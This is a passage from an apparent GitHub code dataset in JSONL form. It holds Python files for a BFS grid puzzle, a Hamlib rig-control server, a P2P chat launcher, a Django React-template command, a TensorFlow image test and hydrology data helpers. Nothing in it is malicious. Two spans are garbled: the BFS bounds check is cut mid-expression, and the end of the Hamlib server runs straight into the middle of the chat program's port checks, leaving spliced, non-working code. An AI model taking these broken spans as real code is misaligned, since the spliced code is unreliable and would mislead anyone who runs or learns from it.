range(k):\n x, y, = map(int, input().split())\n graph[x-1][y-1] = 1\nsx, sy = map(int, input().split())\nsx, sy = sx-1, sy-1\ngx, gy = map(int, input().split())\ngx, gy = gx-1, gy-1\n\nQ = deque()\nQ.append((sx,sy,0))\nvisited = [ [0]* (m+1) for _ in range(n+1) ]\nvisited[sx][sy]=1\n\nx_dir = [-1,0,1,0]\ny_dir = [0,1,0,-1]\n\nwhile len(Q) > 0:\n x, y, dist = Q.popleft()\n if x==gx and y==gy:\n print(dist)\n exit()\n for i in range(4):\n dx = x + x_dir[i]\n dy = y + y_dir[i]\n flag=1\n if 0<=dx dx+xx or dx+xx >= n or 0 > dy+yy or dy+yy >= m or graph[dx+xx][dy+yy] == 1:\n flag=0\n break\n if flag==1:\n visited[dx][dy]=1\n Q.append((dx,dy,dist+1))","repo_name":"hyunjinee/Algorithm","sub_path":"solved.ac/python/2194.py","file_name":"2194.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"36999733371","text":"import sys, time, socket, string\nfrom pprint import pprint\nimport 
threading\n\n##############################################################################################################\n\nDEFAULT_VERBOSITY=0 # 0=quiet, 1=enough to see hand-shaking, 2=detailed\n\n##############################################################################################################\n\n# A possible response to the \"dump_state\" request\ndump1 = \"\"\" 2\n2\n2\n150000.000000 1500000000.000000 0x1ff -1 -1 0x10000003 0x3\n0 0 0 0 0 0 0\n0 0 0 0 0 0 0\n0x1ff 1\n0x1ff 0\n0 0\n0x1e 2400\n0x2 500\n0x1 8000\n0x1 2400\n0x20 15000\n0x20 8000\n0x40 230000\n0 0\n9990\n9990\n10000\n0\n10 \n10 20 30 \n0x3effffff\n0x3effffff\n0x7fffffff\n0x7fffffff\n0x7fffffff\n0x7fffffff\n\"\"\"\n\n# Another possible response to the \"dump_state\" request\ndump2 = \"\"\" 0\n2\n2\n150000.000000 30000000.000000 0x900af -1 -1 0x10 000003 0x3\n0 0 0 0 0 0 0\n150000.000000 30000000.000000 0x900af -1 -1 0x10 000003 0x3\n0 0 0 0 0 0 0\n0 0\n0 0\n0\n0\n0\n0\n\n\n0x0\n0x0\n0x0\n0x0\n0x0\n0\n\"\"\"\n\n\nRIG_MODEL_NETRIGCTL = 2\nRIG_ITU_REGION2 = 2\n\n# See dump_state in rigctl_parse.c for what this means.\ndump3 = \"\".join([\n \"0\\n\", # protocol version\n \"%d\\n\" % RIG_MODEL_NETRIGCTL,\n \"%d\\n\" % RIG_ITU_REGION2,\n \"0 0 0 0 0 0 0\\n\",\n \"0 0 0 0 0 0 0\\n\",\n \"0 0\\n\",\n \"0 0\\n\",\n \"0\\n\",\n \"0\\n\",\n \"0\\n\",\n \"0\\n\",\n \"\\n\",\n \"\\n\",\n \"0x0\\n\",\n \"0x0\\n\",\n \"0x0\\n\",\n \"0x0\\n\",\n\"0x0\\n\",\n \"0\\n\",\n])\n\n\n# This class is created for each connection to the server. It services requests from each client\nclass HamlibHandler:\n \n SingleLetters = {\t\t# convert single-letter commands to long commands\n 'f':'freq',\n 'm':'mode',\n 't':'ptt',\n 'v':'vfo',\n 's':'split',\n 'w':'command',\n 'y':'ant',\n '_':'info',\n '1':'caps',\n 'q':'quit',\n }\n \n def __init__(self, app, sock, address):\n self.app = app\t\t# Reference back to the \"hardware\"\n self.sock = sock\n sock.settimeout(0.5)\n self.address = address\n self.received = ''\n self.P = self.app.P\n self.modeB = None\n self.VERBOSITY = DEFAULT_VERBOSITY\n \n h = self.Handlers = {}\n h[''] = self.ErrProtocol\n h['dump_state']\t= self.DumpState\n h['get_caps']\t= self.GetCaps\n h['get_freq']\t= self.GetFreq\n h['set_freq']\t= self.SetFreq\n h['get_mode']\t= self.GetMode\n h['set_mode']\t= self.SetMode\n h['chk_vfo']\t= self.ChkVfo\n h['get_vfo']\t= self.GetVfo\n h['set_vfo']\t= self.SetVfo\n h['get_split']\t= self.GetSplit\n h['get_ptt']\t= self.GetPtt\n h['set_ptt']\t= self.SetPtt\n h['get_ant']\t= self.GetAnt\n h['set_ant']\t= self.SetAnt\n h['get_command']\t= self.GetCommand\n #h['set_command']\t= self.SendCommand\n h['get_info']\t= self.GetInfo\n h['set_info']\t= self.GetInfo\n h['get_quit']\t= self.Quit\n h['set_quit']\t= self.Quit\n h['get_function']\t= self.GetFunction\n h['set_function']\t= self.SetFunction\n\n if self.app.port==4675 and False:\n self.VERBOSITY = 2\n \n \n # Send text back to the client\n def Send(self, text):\n try:\n if type(text) is list:\n text='\\n'.join(text)\n self.sock.sendall(text.encode())\n except socket.error:\n print('HAMLIB_SERVER: SEND: Socket error - closing socket')\n self.sock.close()\n self.sock = None\n \n # Create a string reply of name, value pairs, and an ending integer code.\n def Reply(self, *args):\t # args is name, value, name, value, ..., int\n if self.extended:\n # Use extended format\n t = \"%s:\" % self.cmd\t\t# Extended format echoes the command and parameters\n for param in self.params:\n t = \"%s %s\" % (t, param)\n t += self.extended\n for i in 
range(0, len(args) - 1, 2):\n t = \"%s%s: %s%c\" % (t, args[i], args[i+1], self.extended)\n t += \"RPRT A %d\\n\" % args[-1]\n #print('HAMLIB_SERVER: Reply A - t=',t)\n \n elif len(args) > 1:\n # Use simple format\n t = ''\n for i in range(1, len(args) - 1, 2):\n #print(i,args[i])\n t = \"%s%s\\n\" % (t, args[i])\n #print('HAMLIB_SERVER: Reply B - t=',t)\n \n else:\n # No names; just the required integer code\n t = \"RPRT C %d\\n\" % args[0]\n #print('HAMLIB_SERVER: Reply C - t=',t)\n \n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: REPLY:',t.rstrip(),'on port',self.app.port)\n self.Send(t)\n \n # Invalid parameter\n def ErrParam(self):\n if self.VERBOSITY>0:\n print('HAMLIB_SERVER: Invalid Param on port',self.app.port)\n #sys.exit(0)\n self.Reply(-1)\n \n # Command not implemented\n def UnImplemented(self):\n self.cmd2=''\n if self.VERBOSITY>0 or True:\n print('*** ERROR *** HAMLIB_SERVER: Unimplemented command:',self.cmd,'on port',self.app.port)\n #sys.exit(0)\n self.Reply(-4)\n \n # Protocol error\n def ErrProtocol(self):\n if self.VERBOSITY>0:\n print('HAMLIB_SERVER: Invalid protocal on port',self.app.port)\n #sys.exit(0)\n self.Reply(-8)\n \n # main processing loop that reads and satisfies requests.\n def Process(self):\n if not self.sock:\n if self.VERBOSITY>=2:\n print('HAMLIB_SERVER: Process: NULL SOCKET on port',self.app.port)\n return 0\n \n # Read any data from the socket\n try:\n text = self.sock.recv(1024).decode(\"utf-8\") \n except socket.timeout:\t# This does not work\n if self.VERBOSITY>=2:\n print('HAMLIB_SERVER: Process: Socket timeout on port',self.app.port)\n except socket.error:\t# Nothing to read\n if self.VERBOSITY>=2:\n print('HAMLIB_SERVER: Process: Socket error on port',self.app.port)\n else:\t\t\t\t\t# We got some characters\n self.received += text\n if self.VERBOSITY>=2:\n print('HAMLIB_SERVER: Process: text=',text.rstrip(),' on port',self.app.port)\n \n if '\\n' in self.received:\t# A complete command ending with newline is available\n cmd, self.received = self.received.split('\\n', 1)\t# Split off the command, save any further characters\n else:\n return 1\n cmd = cmd.strip()\t\t# Here is our command\n self.cmd=cmd\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Got command', cmd,'on port',self.app.port)\n \n # ??? Indicates a closed connection?\n if not cmd:\n print('HAMLIB_SERVER: Empty command :-(')\n self.sock.close()\n self.sock = None\n return 0\n \n # Parse the command and call the appropriate handler\n if cmd[0] == '+':\t\t\t# rigctld Extended Response Protocol\n self.extended = '\\n'\n cmd = cmd[1:].strip()\n elif cmd[0] in ';|,':\t\t# rigctld Extended Response Protocol\n self.extended = cmd[0]\n cmd = cmd[1:].strip()\n else:\n self.extended = None\n\n if cmd[0:1] == '\\\\':\t\t# long form command starting with backslash\n args = cmd[1:].split()\n self.cmd = args[0]\n self.params = args[1:]\n self.Handlers.get(self.cmd, self.UnImplemented)()\n else:\n\n #### Handle compound commands, e.g. 
M USB 0 X USB 0 #####\n # Need to flush out how individual command strip off args - see SetMode\n # Also need to add handlers for 'X' and 'I'\n self.cmd2=''\n Done=False\n while not Done:\n \n # single-letter command\n self.params = cmd[1:].strip()\n cmd = cmd[0:1]\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Process: cmd=',cmd)\n try:\n t = self.SingleLetters[cmd.lower()]\n except KeyError:\n print('HAMLIB_SERVER: KeyError')\n Done=True\n self.cmd=cmd\n self.UnImplemented()\n else:\n #if cmd in string.uppercase:\n if cmd.isupper():\n self.cmd = 'set_' + t\n else:\n self.cmd = 'get_' + t\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Process: cmd1=',self.cmd)\n self.Handlers.get(self.cmd, self.UnImplemented)()\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Process: cmd2=',self.cmd2)\n\n if len(self.cmd2)==0:\n Done=True\n else:\n # Done=True\n cmd = self.cmd2\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Process: Try again, cmd=',cmd)\n\n return 1\n \n # These are the handlers for each request\n def DumpState(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Dump State on port',self.app.port)\n self.Send(dump2)\n\n def GetCaps(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get Caps on port',self.app.port)\n #caps=['Model name:\\tFT-2000', 'Mfg name:\\tYaesu']\n caps=['Model name:\\tpySDR', 'Mfg name:\\tAA2IL']\n self.Send(caps)\n\n # Routine to associate SDR RX number and RIG VFO with a prot number\n def port2rx(self):\n port = self.app.port\n if port==4532 or port==4632 or port==4732:\n irx = 0\n vfo='A'\n elif port==4533 or port==4633 or port==4733:\n irx = 0\n vfo='B'\n elif port>=4675:\n irx = port - 4675\n vfo='B'\n else:\n irx = port - 4575\n vfo='A'\n\n return [irx,vfo]\n\n # Return current freq\n def GetFreq(self):\n if self.P:\n [irx,vfo] = self.port2rx()\n #print('HAMLIB_SERVER: GetFreq:',self.app.port,irx,vfo)\n if self.P.SO2V:\n frq=self.P.sock.get_freq(vfo)\n self.Reply('Frequency', int(frq+0.5) , 0)\n elif self.P.NUM_RX==0:\n frq=self.P.sock.freq # *1e3\n self.Reply('Frequency', int(frq+0.5) , 0)\n else:\n self.app.freq = int( self.P.FC[irx] + 0.5)\n #print(self.P.FC)\n #print(self.P.FC[irx])\n self.Reply('Frequency', self.app.freq, 0)\n else:\n #print('HAMLIB_SERVER: GetFreq', self.app.freq)\n self.Reply('Frequency', self.app.freq, 0)\n\n # Set freq\n def SetFreq(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: SetFreq',self.params,'on port',self.app.port)\n try:\n x = float(self.params)\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n x = int(x + 0.5)\n self.app.freq = x\n\n if self.P:\n [irx,vfo] = self.port2rx()\n #print('HAMLIB_SERVER:.SetFreq: ============================ port=',self.app.port,'/t rx=',irx,'/t frq=',x)\n if self.P.SO2V or self.P.NUM_RX==0:\n print('HAMLIB_SERVER: SetFreq:',irx,vfo,x)\n self.P.sock.set_freq(x*1e-3,vfo)\n else:\n self.P.NEW_FREQ[irx] = x\n self.P.VFO[irx] = vfo\n self.P.FREQ_CHANGE = True\n\n # Return current mode\n def GetMode(self):\n #print('HAMLIB_SERVER: GetMode on port',self.app.port,self.P.SO2V)\n if self.P.SO2V:\n [irx,vfo] = self.port2rx()\n #print('HAMLIB_SERVER: GetMode:',irx,vfo)\n if vfo=='A':\n rig_mode = self.P.sock.get_mode(vfo)\n else:\n if not self.modeB:\n rig_mode = self.P.sock.get_mode(vfo)\n self.modeB = rig_mode\n rig_mode = self.modeB\n #print('HAMLIB_SERVER: GetMode:',irx,vfo,rig_mode)\n self.Reply('Mode', rig_mode, 'Passband', self.app.bandwidth, 0)\n elif self.P.NUM_RX==0:\n rig_mode = self.P.sock.mode\n self.Reply('Mode', rig_mode, 'Passband', self.app.bandwidth, 0)\n else:\n 
self.Reply('Mode', self.app.mode, 'Passband', self.app.bandwidth, 0)\n \n # Set mode\n def SetMode(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: SetMode',self.params,'on port',self.app.port)\n try:\n #mode, bw = self.params.split()\n a=self.params.split()\n if len(a)==1:\n # NONE mode from FLDIGI is mapped to IQ\n mode = 'IQ'\n bw = a[0]\n else:\n mode = a[0]\n bw = a[1]\n if len(a)>2:\n self.cmd2=' '.join(a[2:])\n \n bw = int(float(bw) + 0.5)\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n self.app.mode = mode\n self.app.bandwidth = bw\n\n if self.P:\n [irx,vfo] = self.port2rx()\n #print('HAMLIB_SERVER:.SetMode: ============================ port=',self.app.port,'/t mode/bw=',mode,bw)\n if self.P.SO2V or self.P.NUM_RX==0:\n print('HAMLIB_SERVER: SetMode: mode/irx/vfo=',mode,irx,vfo)\n self.P.sock.set_mode(mode,vfo)\n if vfo=='B':\n self.modeB=mode\n else:\n self.P.NEW_MODE = mode\n self.P.MODE_CHANGE = True\n #print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ NEED to ADD CODE to SET BANDWIDTH **********************\\n')\n\n # Check VFO\n def ChkVfo(self):\n print('HAMLIB_SERVER: Chk VFO on port',self.app.port)\n self.Reply('CHKVFO', 0, 0)\n \n # Return current VFO\n def GetVfo(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get VFO on port',self.app.port)\n [irx,vfo] = self.port2rx()\n self.app.vfo = \"VFO\"+vfo\n self.Reply('VFO', self.app.vfo, 0)\n \n # Set current VFO\n def SetVfo(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Set VFO on port',self.app.port)\n try:\n x = self.params\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n self.app.vfo = \"VFO\"+x\n\n if self.P:\n [irx,vfo] = self.port2rx()\n print('HAMLIB_SERVER:.SetVfo: ============================ port=',self.app.port,'/t rx=',irx,'/t vfo=',vfo)\n if self.P.SO2V or self.P.NUM_RX==0:\n print('HAMLIB_SERVER: SetVfo:',irx,vfo,x)\n self.P.sock.set_vfo(x)\n else:\n self.P.VFO[irx] = x\n \n # Return split state\n def GetSplit(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get SPLIT on port',self.app.port)\n print('HAMLIB_SERVER: *** Get Split is NOT FULLY IMPLEMENTED ***')\n [irx,vfo] = self.port2rx()\n self.app.tx_vfo = \"VFO\"+vfo\n #self.app.tx_vfo = \"VFOA\"\n self.Reply('Split', self.app.split, 'TX VFO',self.app.tx_vfo,0)\n\n # Receive a direct command \n def GetCommand(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: GET COMMAND: cmd=',self.cmd,self.params)\n\n cmds = self.params.split(';')\n #print('cmds=',cmds)\n for cmd in cmds:\n #print('cmd=',cmd,len(cmd))\n\n # Special command for SDR - Audio Recorder on/off\n if len(cmd)==3 and cmd=='REC':\n #print('Recorder setting?')\n resp = 'REC'+str(self.app.record)+';'\n elif len(cmd)==4 and (cmd=='REC0' or cmd=='REC1'):\n #print('Recorder set')\n self.app.record=int(cmd[3])\n #resp = 'REC'+str(self.app.record)+';'\n resp=None\n if self.P:\n self.P.gui.StartStopSave_Demod(iopt=self.app.record)\n else:\n resp=-1\n \n if resp:\n self.Reply('Cmd',resp,0)\n \n # Send a command directly to the rig\n def SendCommand(self):\n print('HAMLIB_SERVER: SEND COMMAND: cmd=',self.cmd,self.params)\n print('This is not fully implemented yet')\n \n # Return rig info\n def GetInfo(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get Info on port',self.app.port)\n if self.P and hasattr(self.P,'sock'):\n info=self.P.sock.get_info()\n self.Reply('Info', info, 0)\n print('HAMLIB_SERVER: Get Info info=',info)\n else:\n self.Reply('Info', self.app.info, 0)\n \n # Return current antenna\n def GetAnt(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get Ant on 
port',self.app.port)\n if self.P:\n ant=self.P.sock.get_ant()\n self.Reply('Ant', 'ANT'+str(ant), 0)\n else:\n self.Reply('Ant', 'ANT'+str(self.app.ant), 0)\n \n # Set antenna port\n def SetAnt(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Set Ant',self.params,'on port',self.app.port)\n print('HAMLIB_SERVER: Set Ant:',self.P.sock.connection)\n if self.P:\n ant=int(self.params)\n print('HAMLIB_SERVER: Set Ant:',ant)\n #if P.sock.connection=='DIRECT':\n self.P.sock.set_ant(ant+1)\n self.Reply(0)\n \n # Return current PTT state\n def GetPtt(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get PTT on port',self.app.port)\n self.Reply('PTT', self.app.ptt, 0)\n \n # Set PPT\n def SetPtt(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Set PTT',self.params,'on port',self.app.port)\n \n try:\n x = int(self.params)\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n print('x=',x)\n if x:\n self.app.ptt = 1\n else:\n self.app.ptt = 0\n if self.P:\n [irx,vfo] = self.port2rx()\n print('irx/vfo=',irx,vfo)\n self.P.sock.ptt(self.app.ptt,vfo)\n else:\n print('No P!')\n\n # Return current function state\n def GetFunction(self):\n if self.VERBOSITY>=1 or True:\n print('HAMLIB_SERVER: Get Function on port',self.app.port)\n self.Reply('RECORD', self.app.record, 0)\n \n # Set Record\n def SetFunction(self):\n if self.VERBOSITY>=1 or True:\n print('HAMLIB_SERVER: Set Function',self.params,'on port',self.app.port)\n \n try:\n x = int(self.params)\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n print('x=',x)\n if x:\n self.app.record = 1\n else:\n self.app.record = 0\n\n \n # No-op - ignore command\n def NoOp(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: No-op on port',self.app.port)\n\n def set_verbosity(self,verbosity):\n self.VERBOSITY=verbosity\n print('HAMLIB_SERVER: Setting verbosity to',self.VERBOSITY,'on port',self.app.port)\n\n def Quit(self):\n print('HAMLIB_SERVER: Quitting on port',self.app.port)\n self.sock.close()\n self.sock = None\n \n def Exit(self):\n print('HAMLIB_SERVER: Exitting on port',self.app.port)\n sys.exit(0)\n\n \n# This is the main application class. It listens for connectons from clients and creates a server for each one.\nclass HamlibServer:\n \n def __init__(self,P=None,port=4575,verbosity=DEFAULT_VERBOSITY):\n print('@@@@@@@@@@@@@@ HAMLIB_SERVER:SERVER Init',port)\n self.port = port\n self.P=P\n self.hamlib_clients = []\n self.VERBOSITY=verbosity\n \n # This is the state of the \"hardware\"\n self.freq = 29999999\n self.mode = 'CW'\n self.bandwidth = 2400\n self.vfo = \"VFOA\"\n self.ptt = 0\n self.record = 0\n self.split = 0\n self.tx_vfo = 'VFOA'\n self.ant = 0\n self.info = 'UNKNOWN'\n\n self.hamlib_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.hamlib_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n print(('localhost', port))\n self.hamlib_socket.bind(('localhost', port))\n self.hamlib_socket.settimeout(0.1)\n self.hamlib_socket.listen(5)\n #self.hamlib_socket.setblocking(False)\n\n # Spawn thread to look for new connection\n print('@@@@@@@@@@@@@@@@@@@@@@@ Spawning accepter',port)\n self.worker = threading.Thread(target=self.Accepter, args=(),name='Accepter '+str(port))\n self.worker.setDaemon(True)\n self.worker.start()\n self.accepter_running = True\n \n def Accepter(self):\n print('@!@!@!@!@!@!@! Acceptor started on port',self.port)\n\n while not self.P.Stopper.isSet():\n time.sleep(1.)\n self.check_connections()\n\n print('@!@!@!@!@!@!@! 
Acceptor ended on port',self.port)\n self.accepter_running = False\n\n def Run(self):\n self.connected=False\n\n print('HAMLIB_SERVER:SERVER Running on port',self.port)\n\n while not self.P.Stopper.isSet():\n #print('HAMLIB_SERVER: Running on port',self.port)\n \n while not self.connected and not self.P.Stopper.isSet():\n #print('HAMLIB_SERVER: Waiting for connection on port',self.port)\n time.sleep(1.)\n #self.check_connections()\n\n n=0\n while self.connected and not self.P.Stopper.isSet():\n time.sleep(.05)\n\n # Check for any new connections\n #n+=1\n #if n>=20:\n # n=0\n # self.check_connections()\n \n # Check if connections are still alive\n for client in self.hamlib_clients:\n ret = client.Process()\n if self.VERBOSITY>=2:\n print('\\nHAMLIB_SERVER: Checking client',client,ret,self.port)\n\n\t # False return indicates a closed connection; remove the server\n if not ret:\n self.hamlib_clients.remove(client)\n print('HAMLIB_SERVER: Removed', client.address)\n self.connected=False\n\n print('HAMLIB_SERVER: waiting for accepeter to stop on port',self.port,' ...')\n while self.accepter_running:\n time.sleep(0.1)\n print('HAMLIB_SERVER: waiting for clients to stop on port',self.port,' ...')\n for client in self.hamlib_clients:\n client.Quit()\n print('HAMLIB_SERVER: Exited on port',self.port)\n\n\n # Function to check for new connections\n def check_connections(self):\n P=self.P\n #print('!@#$%^&*()*&^%$#@$%^&*()*&^%$ HAMLIB_SERVER:SERVER: Checking for new connections ...',self.port)\n\n # Update freq & mode info\n if not P.SO2V or self.P.NUM_RX==0:\n #print(\"P=\",pprint(vars(self.P)))\n port = self.port\n if port==4532 or port==4533 or port==4632 or port==4633 or port==4732 or port==4733:\n irx = 0\n elif port>=4675:\n irx = port - 4675\n else:\n irx = port - 4575\n if irx>=0 and irx65535:\r\n print(\"Invalid port %d.\" %args.port)\r\n return\r\n \r\n if args.entrypoint>65535:\r\n print(\"Invalid local port %d.\" %args.entrypoint)\r\n return\r\n \r\n try:\r\n fp = open(args.key_database, \"a+\") #Creates file if it doesn't exist\r\n if(fp.tell() == 0):\r\n fp.write(\"{}\") #A new empty json database\r\n fp.close()\r\n except IOError:\r\n print(\"Invalid key database %s.\" %args.key_database)\r\n return\r\n \r\n try:\r\n fp = open(args.key_file, \"ab+\") #Creates file if it doesnt exist\r\n if(fp.tell() == 0):\r\n fp.write( X25519PrivateKey.generate().private_bytes(Encoding.Raw,PrivateFormat.Raw,NoEncryption()) )\r\n fp.close()\r\n P2PChatConnection.private_key_file = args.key_file\r\n except IOError:\r\n print(\"Invalid key file %s.\" %args.key_file)\r\n return\r\n \r\n if args.new and args.entrypoint<0:\r\n print(\"Can't start a new chat without an entrypoint; please specify port\")\r\n return\r\n \r\n #Everything is good at this point, start the class\r\n \r\n con = P2PChat(args.entrypoint,args.key_database,args.key_file,PromptUI)\r\n if args.new:\r\n con.createNewRoom()\r\n else:\r\n con.connect(args.ip,args.port)\r\n","repo_name":"marc-weber1/p2pirc","sub_path":"p2pirc/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20534929255","text":"import subprocess\nimport os\nimport sys\nimport site\nfrom django.core.management.templates import TemplateCommand\n\n\ndef windows_dir(source, app_name):\n files_dir = f'''\n mkdir {app_name}\\react\n mkdir -p {app_name}\\templates\\{app_name}\\\\\n mkdir -p {app_name}\\static\\{app_name}\\css\\\\\n mkdir -p 
{app_name}\\static\\{app_name}\\images\\\\\n cp -a {source}\\react\\. {app_name}\\react\\\\\n cp -a {source}\\templates\\*.html {app_name}\\templates\\\\\n cp -a {source}\\templates\\reactify\\*.html {app_name}\\templates\\{app_name}\\\\\n cp -a {source}\\static\\. {app_name}\\static\\\\\n cp -a {source}\\static\\js\\. {app_name}\\static\\js\\\\\n cp -a {source}\\static\\css\\*.css {app_name}\\static\\{app_name}\\css\\\\\n cp -a {source}\\static\\images\\. {app_name}\\static\\{app_name}\\images\\\\\n cp -a {source}\\*.json {app_name}\\\\\n cp -a {source}\\*.js {app_name}\\\\\n '''\n return files_dir\n\n\ndef mac_dir(source, app_name):\n files_dir = f'''\n mkdir {app_name}/react\n mkdir -p {app_name}/templates/{app_name}/\n mkdir -p {app_name}/static/{app_name}/css/\n mkdir -p {app_name}/static/{app_name}/images/\n cp -a {source}/react/. {app_name}/react/\n cp -a {source}/templates/*.html {app_name}/templates/\n cp -a {source}/templates/reactify/*.html {app_name}/templates/{app_name}/\n cp -a {source}/static/. {app_name}/static/\n cp -a {source}/static/js/. {app_name}/static/js/\n cp -a {source}/static/css/*.css {app_name}/static/{app_name}/css/\n cp -a {source}/static/images/. {app_name}/static/{app_name}/images/\n cp -a {source}/*.json {app_name}/\n cp -a {source}/*.js {app_name}/\n '''\n return files_dir\n\nclass Command(TemplateCommand):\n help = 'Create Django app with React templates'\n\n def handle(self, **options):\n app_name = options.pop('name')\n packages = site.getsitepackages()\n\n if len(packages) > 0:\n if sys.platform.startswith('win'):\n source = f'{packages[0]}\\reactify'\n self.generate_react_packages(source, app_name, 'WIN')\n elif sys.platform.startswith('linu'):\n source = f'{packages[0]}/reactify'\n self.generate_react_packages(source, app_name, 'LIN')\n else:\n source = f'{packages[0]}/reactify'\n self.generate_react_packages(source, app_name, 'MAC')\n\n\n def generate_react_packages(self, source, app_name, platform):\n\n try:\n subprocess.run(\n self.react_package_directory(source, app_name, platform),\n shell=True,\n check=True,\n executable='/bin/bash'\n )\n except subprocess.CalledProcessError:\n pass\n\n\n def react_package_directory(self, source, app_name, platform):\n platform_dirs = {\n 'MAC': mac_dir(source, app_name),\n 'LIN': mac_dir(source, app_name),\n 'WIN': windows_dir(source, app_name)\n }\n\n return platform_dirs[platform] + self.install_packages(app_name)\n\n\n def install_packages(self, app_name):\n command_string = f'''\n cd {app_name}\n echo \"Installing react packages...\"\n npm install\n echo \" \"\n echo \"cd {app_name} and run:\"\n echo \" npm run dev\"\n echo \" \"\n echo \"Happy coding 😄!\"\n echo \" \"\n '''\n\n return command_string\n","repo_name":"Bonifase/django-reactify","sub_path":"reactify/management/commands/reactify.py","file_name":"reactify.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"3978778257","text":"import sys; print('Python %s on %s' % (sys.version, sys.platform))\nsys.path.extend(['C:\\\\Users\\\\Administrator\\\\Desktop\\\\detection', 'C:/Users/Administrator/Desktop/detection'])\nfrom CNN.室内物体检测.training.室内物体识别训练 import *\n# 
tf_x=tf.placeholder(tf.float32,[None,768,768,3])\nsess.run([tf.global_variables_initializer(),tf.local_variables_initializer()])\n#重载sess\nget_model(sess)\n#停止更新\ntf.stop_gradient(accuray)\ntf.stop_gradient(conv1)\ntf.stop_gradient(conv2)\ntf.stop_gradient(l1)\ntf.stop_gradient(conv3)\ntf.stop_gradient(conv4)\ntf.stop_gradient(conv5)\n\n# tf_x=tf.placeholder(tf.float32,[None,768,768,3])\n\ndef load_test_img(test_img_path=r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\1.jpg'):\n image=cv2.imread(test_img_path)#获取测试图片\n\n return image\n\n#只是用一张图片来进行验证\ndef check(image):\n global sess\n image_cover=image[np.newaxis,:,:,:].astype(np.float32)\n print(image_cover.shape)\n result=sess.run(conv5,{tf_x: image_cover})\n result_grid=result.argmax(axis=3)[0]\n result_grid1 = result.max(axis=3)[0]\n print(\"检测完成\",result[0].shape,'\\n',result_grid,'\\n',result_grid1)\n return result,result_grid,result_grid1\n\ndef resize(image,shape=(448,448)):\n image_resize=cv2.resize(image, shape)\n cv2.imshow(\"image\", image_resize)\n cv2.waitKey(1000)\n return image_resize\n\nif __name__==\"__main__\":\n path1=r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\1.jpg'\n path2 = r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\2.jpg'\n path3 = r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\3.jpg'\n path4 = r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\4.jpg'\n path5 = r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\5.jpg'\n\n image=load_test_img(path4)\n image_resize=resize(image,shape=(1024,1024))/255.0\n image_resize=image_resize.astype(np.float32)\n print('image_resize',image_resize.shape)\n result,result_grid,result_grid1=check(image_resize)\n\n x=[]\n y=[]\n c=[]\n for i in range(result_grid.shape[0]):\n for j in range(result_grid.shape[1]):\n x.append(i)\n y.append(j)\n c.append(result_grid[i,j])\n\n import matplotlib.pyplot as plt\n plt.scatter(x,y,c=c)\n plt.show()\n\n","repo_name":"msdnqqy/detection","sub_path":"CNN/室内物体检测/使用/using_new.py","file_name":"using_new.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"6806775184","text":"import os\nimport numpy as np\nimport datetime as dt\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n#import joblib\nfrom sklearn.pipeline import Pipeline\n#from dask_ml.preprocessing import StandardScaler\n#from dask_ml.decomposition import PCA\n\n#from dask_ml.xgboost import XGBRegressor\n#from dask_ml.linear_model import LogisticRegression\n#from dask_ml.linear_model import LinearRegression\n#from sklearn.linear_model import Ridge\n\nimport h5py\nimport keras\nfrom keras.layers.core import Dropout\n\nimport geopandas\nfrom rasterio import features\nfrom affine import Affine\n\nimport dask\n#import dask.multiprocessing\ndask.config.set(scheduler='threads')\n\nimport xarray as xr\nfrom dask.diagnostics import ProgressBar\n\nimport sys\nprint(sys.executable)\n\ndef sfloat(f):\n return str(float(f))\ndef sint(i):\n return str(int(i))\n\ndef read_glofas_danube():\n glofas = xr.open_dataset('../data/danube/glofas_reanalysis_danube_1981-2002.nc')\n glofas = glofas.rename({'lat': 'latitude', 'lon': 'longitude'}) # to have the same name like in era5\n glofas = shift_time(glofas, -dt.timedelta(days=1)) # the discharge is the mean of the previous 24h of the timestamp\n return glofas\n\ndef shift_time(ds, value):\n ds.coords['time'].values = pd.to_datetime(ds.coords['time'].values) 
